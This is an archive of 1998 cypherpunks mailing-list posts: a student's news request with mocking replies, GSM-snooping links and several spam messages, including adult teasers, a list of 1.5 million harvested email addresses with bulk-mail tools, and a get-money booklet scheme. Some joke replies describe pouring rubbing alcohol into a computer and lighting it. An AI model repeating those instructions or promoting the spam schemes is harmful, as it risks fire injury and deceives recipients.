+ SEXY SURPRISE THUMBS - A SURPRISE EVERY CLICK
+ PICTURE PERFECT PUSSY - WHAT DOES A GIRL'S PUSSY REVEAL?
+ ULTRA HI-RES POSTER - SAVE IT, PRINT IT, KEEP IT!

       ---->   http://stuffed.net/98/8/30/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/30/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sboyd" <sboyd@scsn.net>
Date: Sun, 30 Aug 1998 06:06:57 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: News for class
Message-ID: <19980830125833354.AAA195@pccorner>
MIME-Version: 1.0
Content-Type: text/plain


Please inform me how I can get the news each day by e-mail at
flashboyd@aol.com.  This information will be used in my comm class.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sun, 30 Aug 1998 12:55:15 -0700 (PDT)
To: <@cypherpunks@toad.com>
Subject: Re: News for class
Message-ID: <3.0.32.19691231160000.034ab6b8@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


For "the news" just sign up for abcnews.com or msnbc.
For truth and information you'll have to go search.

At 08:58 AM 8/30/98 -0400, sboyd wrote:
>
>Please inform me how I can get the news each day by e-mail at
>flashboyd@aol.com.  This information will be used in my comm class.
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: interception <interception@ii-mel.com>
Date: Sun, 30 Aug 1998 06:20:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <1.5.4.32.19980830132037.0067f838@mail.ii-mel.com>
MIME-Version: 1.0
Content-Type: text/plain


http://jya.com/cell-track.htm
http://jya.com/gsm-scandal.htm
http://jya.com/gsm-snoop.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Maffei" <marcmf@2xtreme.net>
Date: Sun, 30 Aug 1998 15:55:11 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: News for class
Message-ID: <013a01bdd466$8a8708a0$943593d0@marcmaff>
MIME-Version: 1.0
Content-Type: text/plain


no.... I don't think that is what is being asked here, read the message
again and you will see that he is asking for getting news not being news
(even though I would love it if aolers would become news in the worst way),
so I suggest that instead he should do this:
1.) go to his mailbox or PO box
2.) open up his computer
3.) carefully insert mail in any possible cavity (in computer stones for
brain)
4.) and now proceed with prior suggestion or
5.) ensure computer is plugged in (wall socket, you know... socket connected
to power grid, grid connected to generator... etc)
6.) pour water or other suitably conductive liquid on whole mess
7.) repeat all steps as often as necessary for enlightenment to be achieved
 This might not get the poster closer to knowledge as far as news is
concerned but it should definitely provide us with a chuckle or two.
-----Original Message-----
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Sunday, August 30, 1998 3:42 PM
Subject: Re: News for class


>On Sun, 30 Aug 1998, sboyd wrote:
>
>>
>> Please inform me how I can get the news each day by e-mail at
>> flashboyd@aol.com.  This information will be used in my comm class.
>>
>>
>
>It's really easy, but requires some work with hardware. First, you open
>your computer. Then you get a large sledgehammer and bash the inside of
>the computer thrice. WARNING: If you do it less than three times this may
>not work! Then, you get five liters of rubbing alcohol and pour it into
>the machine, wait about a minute, then stick your head about an inch from
>it and drop a match.
>
>Congratulations! You're in the news!
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 30 Aug 1998 18:28:50 -0700 (PDT)
To: abumujahid@taliban.com
Subject: Moving ahead
Message-ID: <35E9FB20.177B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 8/30/98 6:58 PM

NYA and John Young

I bought three books for you guys at B Dalton at the Cottonwood
mall in Rio Rancho last night.

One is titled

	LOS ALAMOS
	and the development of the 
	ATOMIC BOMB

	by Robert W. Seidel

The book covers von Nuemann, Feynman, Ulam, and Metropolis.

These guys pioneered use of Monte Carlo techniques in nuclear bomb
design.

My former MS and  Ph.D. student Ted Lewis 

http://www.friction-free-economy.com    

told me some years ago that the GFSR 

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html          

is used the nuclear bomb simulations.

We were into Monte Carlo work in the '70s

http://www.mhpcc.edu/general/john.html       

But in the '80s I WAS FORCED into the business of electronic locks, data
authentication
and fuzing weapons.

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2 
http://jya.com/f86/whpf86.htm

And KNEW ABOUT

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

Let's ALL hope for settlement.  So that we CAN ALL move on to better
projects.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sun, 30 Aug 1998 14:22:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: News for class
Message-ID: <c8a7cda48d60c733bd002a7f0098449f@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Aug 1998, sboyd wrote:

> 
> Please inform me how I can get the news each day by e-mail at
> flashboyd@aol.com.  This information will be used in my comm class.
> 
> 

It's really easy, but requires some work with hardware. First, you open
your computer. Then you get a large sledgehammer and bash the inside of
the computer thrice. WARNING: If you do it less than three times this may
not work! Then, you get five liters of rubbing alcohol and pour it into
the machine, wait about a minute, then stick your head about an inch from
it and drop a match.

Congratulations! You're in the news!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dorthy@coolmail.to
Date: Sun, 30 Aug 1998 22:34:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Be Happy Tonight....
Message-ID: <199808310534.WAA13823@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey cypherpunks:
Welcome To The Largest And Most Popular Dating Service
Servicing Every Country/City  In The World
Are You Alone Tonight????????
Call Now!!! 1-900-950-4669
Are You Going Away On A Buisness Trip And You Need Some Company At The Other End??????
Find Local Singles Who Would Like To Meet Single People Just Like You.
Call Today And Locate The Girl Or Guy Of Your Dreams!!!!!!
We Have Over 3000 NEW girls daily Just In The USA
Call TOLL FREE 1-888-448-4688
**LADIES CALL FREE**

***************************************************************
If You Would Like To Be Removed From Our Future Mailings,
Please Reply With The Subject Remove,
Or Manually Send To sperta@coolmail.to
And Your Email Will Be Entered In The Global Remove Filter.
****************************************************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pop.prodigy.net@pimout3-int.prodigy.net
Date: Sun, 30 Aug 1998 21:35:18 -0700 (PDT)
Subject: Low Cost Health Insurance
Message-ID: <eaep.3.0.reg.StePT4.36037.887549537@smtp.prodigy.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear <Contact>,

Join thousands who are saying "No" to the high cost of health care! That's right.  Kaiser 
Permanente's traditional plan for small business is the health care plan with:

* Rates as low as $80 for a single employee

* $15 Office Visit Co-payments

* $10 Prescription Benefit

* 100% Hospitalization

* All Pre-existing Conditions Accepted

For more information on how to enroll in our small business plans please contact: 
(info@westcare1.com)

Robert A. Harding
Westcare Insurance Services 
Authorized Agent for Kaiser Permanente
Phone: 800-420-0370
Fax: 714-538-5730
Calif. Dept. of Insurance Lic. #0693891

If you wish not to receive email from us, please reply to sender and we will remove your name from 
the list.

Thank you.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ftwi@magnumhosting.com
Date: Mon, 31 Aug 1998 02:28:00 -0700 (PDT)
To: <gnu@toad.com>
Subject: 1,500,000 FRESH Email Addresses - JUST $25 !!!
Message-ID: <199808310927.CAA15146@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-------------------------------------------------------------------
Removal Instructions can be found at the bottom of this page !
-------------------------------------------------------------------

HERE IT IS!!  The earnings pontential you have been looking for!  FTWI will 
provide you with 1.5 MILLION EMAIL ADDRESSES FOR ONLY $25. These are all 
fresh addresses with no duplications. They are all sorted and ready to be 
mailed. This is the best deal anywhere today for email lists!  Imagine 
selling a product for only $10 and getting only a 1/1000 response. That's 
$15,000!!!  Money making plans, reports, lists, jewelry, art, etc. Whatever 
you want to sell!  People are making millions of dollars right now by doing 
the same thing! That is why you get so much email from people selling you 
their product....it works! These 1.5 Million email addresses are yours to 
keep, so you can use them over and over and they can be downloaded right from 
the internet or sent by mail on disk....your choice. 

Extras included with your order:

1.  Links to FREE bulk email capable software downloads.
2.  Link to 10-day trial software that turns your personal computer into
    your very own personal mail server! Never use your ISP's SMTP mail
    server again!
3.  Link to 15-day trial email list management software.  Great product
    to handle all your remove requests and filtering.  Handles huge lists
    FAST!
4.  50 FREE Internet marketing reports. Web positioning in search engines,
    writing effective sales letters & many more. Use them as you wish.
 
  
Simply print out and complete this order form and send it to us along with 
your check or money order made payable to: FTWI for only $25.  

Send addresses via (circle one):
     DOWNLOAD              MAIL (add $3 for shipping and handling)

Name: _________________________________________________
Address: ______________________________________________
City: _____________________State: _____Zip: ___________
Phone number:_________________Date: ___/___/___
Email: _______________________________ 
Valid email address needed for Download orders. Returned checks are subject 
to $25 NSF Fee


Send your order and payment to: 
FTWI. 
4019 Goldfinch, Ste. J
San Diego, CA 92103 

We offer more services and products for online marketers. For more info visit 
our site at: http://www.magnumhosting.com/ftwi/
Or email us at: ftwi@magnumhosting.com

For bulk friendly webhosting and an opportunity to resell and get free bulk 
service visit:  http://www.magnumhosting.com/osg/2248

THANK YOU!!!



------------------------------------------------------------------

This message complies with the proposed United States 
Federal requirements for commercial e-mail bill, Section 301.

For additional info see: 
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

Required Sender Information:

FTWI
4019 Goldfinch St, Ste. J
San Diego, CA 92103 
6194910215 

Per Section 301, Paragraph (a)(2)(C) of S. 1618, further 
transmissions to you by the sender of this e-mail may be 
stopped at NO COST to you by sending a reply to 
ftwi@magnumhosting.com with the word "remove" in the
subject line. 

------------------------------------------------------------------

The Mailing List that you are being mailed from was also filtered against
the Global Remove List at: http://remove-list.com
Remove-List is a free public service offering to help the general public
get removed from bulk mailings lists and has not sent this message. If 
you want their help please add your name to their list and you will not 
receive a bulk email from us or any other ethical bulk emailer who filters 
against their lists.

------------------------------------------------------------------



 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DDoss5@aol.com
Date: Mon, 31 Aug 1998 00:04:16 -0700 (PDT)
Subject: hi
Message-ID: <3b1ad23f.35ea48bb@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Get over five million people to send you $2.00 without spending any money!
Absolutely no junk mailing or e-mailing is involved.  This complete
instruction booklet will show you step by step how to reach over five million
people for free, how to get them to each send you $2.00, and proof that it
works.  This simple technique can and will work for you guaranteed!

If you are interested then this booklet can be yours for only $3.00.  With
your package you will receive a phone number and a personalized seven digit
code.  Your address is recorded with your seven digit code so if for any
reason you are unsatisfied with the information you receive, call the number,
enter in your seven digit code then hang up and your money will be mailed back
to you automatically, no questions asked!

You have nothing to lose and everything to gain!

Send $3.00 or any questions to:

Goldtec Publications
15030 Ventura Blvd, Suite 903 
Sherman Oaks, CA  91403


You are not put on to any mailing lists whatsoever.

/ / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / /
/ / / / / / / / / / / / / / / / / 
This message complies with the proposed United States Federal requirements
for commercial email plus Washington State Commercial Email Bill. for
information see: http://www.senate.gov/~murkowski/commercialemail/
EMailAmendText.html  and for Washington State Commercial Email Bill:
http://ww.wa.gov/wwweb/AGO/ sender information: Goldtec Publications, Sherman
Oaks, CA  91403  To stop future mailings from us at no cost to you, please <A
HREF="mailto:remove@remove-list.com">CLICK HERE</A> to send us an email and
type "remove" in the subject line.
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 31 Aug 1998 01:39:48 -0700 (PDT)
To: (STUFFED MONDAY AUGUST 31 1998)
Subject: 30 FREE HI-RES JPEGS TODAY/Wet dreams at work are dismissable offence
Message-ID: <19980831071001.7876.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Yet another picture bonanza day,  with 30 superb jpeg photos
squeezed into  today's issue  of Stuffed.  We're pulling out
all the stops  now we see  more and more  of you  spending a
longer time reading the paper. Rest assured, if you want it,
it's legal and we can get it,  we'll feature  it in Stuffed!

+ PAGE 2 'SPREAD' - YEOUCH IS SHE HOT!
+ WRONG WAY WILLY: DR'S BLUNDERS IN THE WORST PLACE IMAGINABLE
+ HEALTH FOOD WHOREHOUSE: 'JUST OFF TO DO THE SHOPPING DEAR...'
+ THUMBNAIL HEAVEN: THAT'S WHERE WE WERE WHEN WE COMPILED IT
+ TODAY'S SEXY STORY: 'A SECRET AFFAIR'
+ WOMEN ARE EASY: FINALE OF A FABULOUS SERIES
+ CLIT IN THE CLOSET
+ YOUR TRUE SEX SECRETS: TODAY A SALESMAN WRITES
+ MORE OF THE BEST WEB SITES EVER REVIEWED IN EUREKA!
+ SEXY SURPRISE THUMBS: A SURPRISE WITH EACH CLICK
+ DATING THE OLD FASHIONED WAY
+ SUPER HI-RES POSTER PIC: SAVE OR PRINT IT!

       ---->   http://stuffed.net/98/8/31/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/31/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clark, Beau (CLBM)" <CLBM@chevron.com>
Date: Mon, 31 Aug 1998 10:55:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3B286631A9CFD1118D0700805F6F9F5A2C16E5@hou281-msx1.chevron.com>
MIME-Version: 1.0
Content-Type: text/plain


Remove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 31 Aug 1998 11:12:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: hola and good tidings
In-Reply-To: <199808311641.SAA29684@replay.com>
Message-ID: <35EAE807.71D5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain


>  hola and good tidings
>   send some info on spooks please
>   i will be grateful
> 

I would suggest budgeting about $10k for some GOOD night vision
equipment, then find a good thick hedge and set up a suburban watch
post. Focus on evenings. You will find some activity on Oct 30 though
activity will peak on Oct 31. However, I would steer clear of the
targets because if you approach them, even if only for the purposes of
inquiry, their parents may loose the rottweilers or shoot you between
the eyes and no Second Chance vest will help you in either case.

BTW what areas will you be surveilling?

Egads,
M




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard" <rsholl@hotmail.com>
Date: Mon, 31 Aug 1998 11:33:12 -0700 (PDT)
To: rsholl@hotmail.com
Subject: ATTN: ADULT WEBMASTERS ONLY!
Message-ID: <199808311833.OAA00436@gti.gti.net>
MIME-Version: 1.0
Content-Type: text/plain



Attention Adult Webmasters--add FRESH content to your site!

Richard S. Hollander, former Managing Editor of HIGH SOCIETY Magazine
, former Editor-in-Chief of HAWK Magazine,
and current contributor to both HUSTLER EROTIC VIDEO GUIDE and
GALLERY Magazine, is now offering QUALITY
adult erotic fiction PLUS a bonus CD-ROM review to adult Webmasters.
He's a a proven author who is read by more than *1
MILLION* people a month!

This is the most inexpensive and effective way to add fresh content
to your site. Each month, you'll receive TWO erotic
stories PLUS a bonus adult CD-ROM review.

***Having erotic fiction on your site means having more KEYWORDS for
SEARCH ENGINES! Why type-in the
word "sex" 100 times on your page, when you can have search engines
"see" an entire STORY?! Use erotic fiction
to your SEARCH ENGINE ADVANTAGE!***

Want to "upsell" a video stream or live cybersex? What better way to
get users ready (and horny) than with hot n' juicy erotic
fiction? Quality, reliability, and satisfaction--for just $39.95 a
month.

Go to http://www.rshollander.com/webmaster NOW for your FREE SAMPLES



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 31 Aug 1998 10:46:16 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 31, 1998
Message-ID: <199808311737.MAA29806@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713796.multipart/mixed"

--Boundary..3995.1071713796.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3995.1071713796.multipart/mixed
Content-Type: application/octet-stream; name="bin00026.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00026.bin"
Content-Description: "_CTIA_Daily_News_19980831a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMzEsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPldvcmxkd2lkZSBDZWxsdWxhciBTdWJz
Y3JpYmVycwpXaWxsIE1vcmUgdGhhbiBEb3VibGUmbmJzcDs8QlI+CmluIFRl
biBZZWFyczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5BY2NvcmRpbmcgdG8gQmFza2VydmlsbGUgQ29tbXVuaWNhdGlv
bnMsCnRoZSBnbG9iYWwgcG9wdWxhdGlvbiBvZiBjZWxsdWxhciBwaG9uZSB1
c2VycyBpcyBleHBlY3RlZCB0byByZWFjaCA3MTUKbWlsbGlvbiB3aXRoaW4g
YSBkZWNhZGUsIG1vcmUgdGhhbiBkb3VibGluZyAxOTk4IHN1YnNjcmlwdGlv
biBmaWd1cmVzIG9mCjI2OCBtaWxsaW9uLiBUaGlzIGlzIGVxdWl2YWxlbnQg
dG8gMTIuNyUgb2YgdGhlIHdvcmxkJ3MgcG9wdWxhdGlvbiwgdXAKZnJvbSA1
LjUlIGluIDE5OTggYW5kIDEuOSUgaW4gMTk5NS4gKDxBIEhSRUY9Imh0dHA6
Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MzEvY2FfYmFza2Vydl8xLmh0
bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Tm9ydGVsIGFuZCBCYXkgTmV0d29y
a3MKQW5ub3VuY2UgQ29tcGxldGlvbiBvZiBNZXJnZXI8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QXMgYSByZXN1bHQg
b2YgdGhlIG1lcmdlciwgZWFjaCBvdXRzdGFuZGluZwpzaGFyZSBvZiBCYXkg
TmV0d29ya3MgY29tbW9uIHN0b2NrIHdhcyBjb252ZXJ0ZWQgaW50byBhIHJp
Z2h0IHRvIHJlY2VpdmUKMC42MCBvZiBhIE5vcnRlbCBjb21tb24gc2hhcmUg
YW5kIEJheSBOZXR3b3JrcyBiZWNhbWUgYSB3aG9sbHktb3duZWQgc3Vic2lk
aWFyeQpvZiBOb3J0ZWwuIEJheSBOZXR3b3JrcyBjb21tb24gc3RvY2sgd2ls
bCBubyBsb25nZXIgdHJhZGUgb24gdGhlIE5ldyBZb3JrClN0b2NrIEV4Y2hh
bmdlLiBOb3J0ZWwgaXNzdWVkIGFwcHJveGltYXRlbHkgMTM1IG1pbGxpb24g
Y29tbW9uIHNoYXJlcyBpbgpjb25uZWN0aW9uIHdpdGggdGhlIG1lcmdlci4g
KDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MzEv
bm9ydGVsX21lcl8xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TmV3IEhh
bmRoZWxkIFBDcyB0byBCZQpJbnRyb2R1Y2VkIGluIE9jdG9iZXI8L0ZPTlQ+
PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+TWljcm9z
b2Z0IHBsYW5zIHRvIGludHJvZHVjZSBhIG5ldyBXaW5kb3dzCkNFIHBsYXRm
b3JtLCBIYW5kaGVsZCBQQyBQcm9mZXNzaW9uYWwsIHdpdGggYSBicm9hZGVy
IHJhbmdlIG9mIGFwcGxpY2F0aW9ucy4KKDxBIEhSRUY9Imh0dHA6Ly93d3cu
emRuZXQuY29tL3pkbm4vc3Rvcmllcy96ZG5uX3NtZ3JhcGhfZGlzcGxheS8w
LDM0NDEsMjEzMjg0NCwwMC5odG1sIj5aRE5FVDwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNp
Z25zIFNob3cgJ1dpbnRlbCcgQXhpcwpJcyBCZWdpbm5pbmcgdG8gV29iYmxl
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PkV2ZXJ5d2hlcmUgYXJvdW5kIFNpbGljb24gVmFsbGV5IHRoZXNlCmRheXMs
IHRoZXJlIHNlZW0gdG8gYmUgc2lnbnMgdGhhdCB0aGUgc28tY2FsbGVkIGFs
bGlhbmNlIGJldHdlZW4gTWljcm9zb2Z0CldpbmRvd3MgYW5kIHRoZSBJbnRl
bCBjaGlwLCB0aGUgc28tY2FsbGVkIFdpbnRlbCBkdW9wb2x5LCBtYXkgYmUg
dW5yYXZlbGluZy4mbmJzcDsKKDxBIEhSRUY9Imh0dHA6Ly93d3cubnl0aW1l
cy5jb20vbGlicmFyeS90ZWNoLzk4LzA4L2JpenRlY2gvYXJ0aWNsZXMvMzFj
aGlwLmh0bWwiPk5FVwpZT1JLIFRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RXZlbiBX
aXRob3V0IFBDLCBFbWFpbApGaW5kcyBZb3U8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QSBuZXcgZW1haWwgc2Vydmlj
ZSBjYWxsZWQgTWFpbFB1c2ggYWxsb3dzCmVtYWlsIHVzZXJzIHRvIGNoZWNr
IGZvciBuZXcgbWVzc2FnZXMgdXNpbmcgZmF4LCBwaG9uZSwgd2lyZWxlc3Ms
IG9yIHBhZ2VyLgooPEEgSFJFRj0iaHR0cDovL3d3dy5uZXdzLmNvbS9OZXdz
L0l0ZW0vMCw0LDI1ODU2LDAwLmh0bWw/b3d2Ij5ORVdTLkNPTTwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPlNvdXRod2VzdGVybiBCZWxsIERvbmF0ZXMKV2lyZWxlc3MgU2Vy
dmljZSZuYnNwOzxCUj4KdG8gRW1lcmdlbmN5IFdvcmtlcnMgaW4gU291dGgg
VGV4YXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+U291dGh3ZXN0ZXJuIEJlbGwgbWFkZSAxMDAgd2lyZWxlc3MgcGhv
bmVzCmF2YWlsYWJsZSB0byBsb2NhbCBlbWVyZ2VuY3kgY3Jld3MsIHByb3Zp
ZGVkIHdpcmVsZXNzIHNlcnZpY2UgdG8gbWVtYmVycwpvZiB0aGUgRmVkZXJh
bCBFbWVyZ2VuY3kgTWFuYWdlbWVudCBBZG1pbmlzdHJhdGlvbiAoRkVNQSkg
YW5kIGVzdGFibGlzaGVkCnRlbGVjb21tdW5pY2F0aW9ucyBzZXJ2aWNlcyB0
byB0aGUgbG9jYWwgRW1lcmdlbmN5IE9wZXJhdGlvbnMgQ2VudGVyLiZuYnNw
